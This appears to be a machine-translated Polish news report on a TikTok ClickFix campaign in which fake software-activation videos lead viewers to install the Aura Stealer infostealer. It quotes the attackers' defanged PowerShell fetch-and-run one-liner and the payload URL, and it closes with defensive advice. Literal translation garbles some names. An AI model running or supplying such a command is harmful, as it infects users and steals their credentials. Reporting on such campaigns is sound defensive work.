Cyberprzestępcy rozpowszechniają na TikToku złośliwe oprogramowanie kradnące informacje, korzystając z filmów udających przewodniki aktywacji bezpłatnego oprogramowania. Według Błyszczący KomputerXavier Mertens, specjalista ds. obsługi ISC, zidentyfikował trwającą kampanię, w której w celu infekowania systemów komputerowych wykorzystuje się metodę inżynierii społecznej znaną jako atak ClickFix. Filmy, obserwowane przez Błyszczący Komputertwierdząc, że udostępniają instrukcje dotyczące aktywacji legalnego oprogramowania, takiego jak Windows, Microsoft 365, Adobe Premiere, Photoshop, CapCut Pro i Discord Nitro. W ramach kampanii promowane są także fikcyjne usługi, m.in. „Netflix Premium” i „Spotify Premium”. Mertens zauważył, że to działanie jest w dużej mierze takie samo jak kampania obserwowana wcześniej przez firmę ochroniarską Trend Micro w maju. W filmach wykorzystano technikę inżynierii społecznej, która przedstawia pozornie prawidłową poprawkę lub zestaw instrukcji mających na celu oszukanie użytkowników w celu złamania zabezpieczeń ich własnych komputerów. Ten atak ClickFix nakłania użytkowników do wykonania złośliwych poleceń programu PowerShell. W każdym filmie wyświetlane jest jednowierszowe polecenie, takie jak `iex (irm slmgr[.]win/photoshop)” i instruuje widzów, aby uruchomili go z uprawnieniami administratora. Nazwa programu w adresie URL jest modyfikowana w celu dopasowania do oprogramowania, pod które się podszywasz; fałszywy przewodnik po systemie Windows używałby adresu URL zawierającego „Windows” zamiast „Photoshop”. Po wykonaniu polecenia PowerShell łączy się ze zdalną witryną `slmgr[.]win`, aby pobrać i uruchomić kolejny skrypt PowerShell. Ten skrypt pobiera dwa pliki wykonywalne ze stron Cloudflare. Pierwszy z `https://file-epq[.]strony[.]dev/updater.exe`, jest odmianą złośliwego oprogramowania Aura Stealer. Celem tego złodzieja informacji jest zbieranie zapisanych danych uwierzytelniających przeglądarki, plików cookie uwierzytelniających, danych portfela kryptowalut i innych danych uwierzytelniających aplikacji. Skradzione dane są następnie przesyłane do atakujących, zapewniając im dostęp do kont ofiary. W ramach ataku pobierany jest również drugi ładunek, „source.exe”. Według Mertensa ten plik wykonywalny samodzielnie kompiluje kod przy użyciu wbudowanego kompilatora Visual C# platformy .NET („csc.exe”). Powstały kod jest następnie wstrzykiwany i uruchamiany bezpośrednio w pamięci. Konkretny cel tego dodatkowego ładunku pozostaje niejasny. Użytkownicy, którzy wykonali te kroki, powinni uznać, że wszystkie ich dane uwierzytelniające zostały naruszone. Zalecanym sposobem działania jest natychmiastowe zresetowanie haseł we wszystkich witrynach i usługach, z których korzystają, aby zapobiec nieautoryzowanemu dostępowi do konta i dalszej kradzieży danych. Ataki ClickFix stały się popularne w ciągu ostatniego roku i są wykorzystywane do dystrybucji różnych odmian złośliwego oprogramowania w kampaniach kradzieży oprogramowania ransomware i kryptowalut. Ogólną zasadą jest, że użytkownicy nigdy nie powinni kopiować tekstu ze strony internetowej i uruchamiać go w oknie dialogowym systemu operacyjnego. Ten poradnik obejmuje pasek adresu Eksploratora plików, wiersz poleceń, monity programu PowerShell, terminal macOS i powłoki systemu Linux.
